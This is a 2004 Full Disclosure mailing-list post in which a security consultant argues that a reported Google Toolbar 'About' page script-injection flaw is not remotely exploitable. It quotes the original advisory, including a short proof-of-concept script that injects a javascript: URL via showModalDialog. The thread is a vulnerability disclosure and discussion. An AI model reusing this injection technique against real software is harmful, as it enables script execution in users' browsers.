Full Disclosure mailing list archives
Re: GoogleToolbar:About -- Allows Script Injection
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Sat, 18 Sep 2004 19:31:15 +0200
This is not dangerous from remote, because the "res:" protocol is not accessible by internet zone. You must to find a way to access "res:" from remote, otherwise it means nothing. As for local zone, you can ran scripts in mycomputer zone. Rafel Ivgi, The-Insider Security Consultant, Finjan.com ----- Original Message ----- From: "ViPeR" <viper31337 () yahoo co in> To: <news () securiteam com>; <bugtraq () securityfocus com>; <bugs () securitytracker com>; <vulnwatch () vulnwatch org>; <vuln () security nnov ru>; <sec-adv () secunia com>; <submissions () packetstormsecurity org> Sent: Friday, September 17, 2004 10:51 AM Subject: GoogleToolbar:About -- Allows Script Injection Affection Software : GoogleToolbar Version : Tested on 2.0.114.1-big/en (GGLD) Notes: GoogleToolbar's About section allows injection of script, since it lacks any checking. The following code is a Proof Of Concept. <s c r i p t> window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dl l/ABOUT.HTML", "<div style=\"background-image: url(javascript:alert(location.href));\">"); </s c r i p t> rgds, Gregory R. Panakkal / Viper ________________________________________________________________________ Yahoo! India Matrimony: Find your life partner online Go to: http://yahoo.shaadi.com/india-matrimony _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: GoogleToolbar:About -- Allows Script Injection Rafel Ivgi, The-Insider (Sep 18)
- Re: GoogleToolbar:About -- Allows Script Injection Liu Die Yu (Sep 19)
- <Possible follow-ups>
- Re: GoogleToolbar:About -- Allows Script Injection ViPeR (Sep 19)